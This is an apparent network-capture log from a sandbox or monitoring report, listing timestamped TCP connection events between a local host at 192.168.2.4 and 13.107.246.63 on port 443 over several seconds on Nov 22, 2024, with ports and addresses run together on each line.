                                                                                                                                                                                                            Nov 22, 2024 04:27:28.822419882 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.825098991 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.825149059 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.825239897 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.825413942 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.825429916 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.907191038 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.907255888 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.907303095 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.907484055 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.907504082 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.907516003 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.907525063 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.910336018 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.910377026 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.910459042 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.910645962 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.910660982 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.929431915 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.929583073 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.929660082 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.929704905 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.929706097 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.929730892 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.929739952 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.932351112 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.932399988 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.932481050 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.932615042 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.932631016 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.211976051 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.212038994 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.212090015 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.212261915 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.212275982 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.212285995 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.212291956 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.215166092 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.215204954 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.215295076 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.215431929 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:29.215440989 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.282367945 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.282993078 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.283013105 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.283492088 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.283498049 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.634821892 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.635274887 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.635298014 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.635745049 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.635751963 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.638988018 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.639250040 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.639269114 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.639597893 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.639602900 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.712251902 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.712781906 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.712816954 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.713244915 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.713249922 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.745414019 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.745480061 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.745543003 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.745677948 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.745697021 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.745707035 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.745712042 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.748199940 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.748255014 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.748330116 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.748456001 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:30.748473883 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.072612047 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.073506117 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.073597908 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.073669910 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.079595089 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.079622984 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.083758116 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.083770037 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.084685087 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.084779024 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.084831953 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.087882042 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.087903976 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.087914944 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.087920904 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.105218887 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.105266094 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.105278969 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.105285883 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.142482042 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.142523050 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.142596960 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.142996073 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.143016100 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.147866011 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.147921085 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.147981882 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.148102045 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.148114920 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.155626059 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.155802011 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.155858994 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.156075001 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.156090975 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.156100988 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.156105995 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.160352945 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.160391092 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.160448074 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.160928965 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.160944939 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.525002956 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.525079966 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.525439978 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.525440931 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.525440931 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.528280973 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.528328896 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.528410912 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.528552055 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.528563976 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.835303068 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:31.835354090 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.527005911 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.527440071 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.527467966 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.527916908 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.527924061 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.905550003 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.906090975 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.906117916 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.906629086 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.906634092 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975281954 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975317001 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975372076 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975418091 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975455999 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975697041 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975725889 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975742102 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.975749969 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.978768110 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.978821039 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.978996992 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.979166031 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.979180098 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.992857933 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.993407011 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.993439913 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.993894100 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.993900061 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.003334999 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.003899097 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.003937006 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.004463911 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.004479885 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.258791924 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.260468006 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.260499954 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.261051893 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.261056900 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361437082 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361463070 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361552954 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361582041 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361818075 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361833096 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361843109 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.361993074 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.362021923 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.362061024 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.364532948 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.364572048 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.364649057 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.365304947 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.365319967 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.438788891 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.438957930 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.439038038 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.439165115 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.439182997 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.439199924 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.439205885 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.441967964 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.442022085 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.442121983 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.442682981 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.442696095 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.457226992 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.457321882 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.457381964 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.457488060 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.457506895 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.457520962 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.457528114 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.460256100 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.460293055 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.460450888 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.460489035 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.460494995 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.694950104 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.694973946 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.695067883 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.695099115 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.695152998 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.703051090 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.703119040 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.703176022 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.705938101 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.705955982 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.705969095 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.705974102 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.798928976 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.798994064 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.799117088 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.809972048 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:33.809983969 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:34.778160095 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:34.778858900 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:34.778938055 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:34.779340982 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:34.779354095 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.019180059 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.019854069 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.019875050 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.020194054 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.020215988 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.123071909 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.123728037 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.123753071 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.124212027 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.124218941 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226049900 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226082087 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226164103 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226192951 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226619005 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226634026 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226654053 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226867914 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.226907969 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.228318930 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.229499102 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.229554892 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.229639053 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.229835033 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.229852915 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.259687901 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.260446072 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.260468006 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.260821104 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.260829926 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.454505920 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.457590103 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.457833052 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.457833052 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.457834005 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.460596085 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.460639954 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.460707903 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.460967064 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.460978031 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.556531906 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.560007095 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.560084105 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.560128927 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.560153961 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.560173988 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.560184002 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.563184977 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.563222885 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.563322067 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.563478947 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.563497066 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.699032068 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.699649096 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.699664116 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.700140953 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.700145006 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.704999924 CET4434993013.107.246.63192.168.2.4
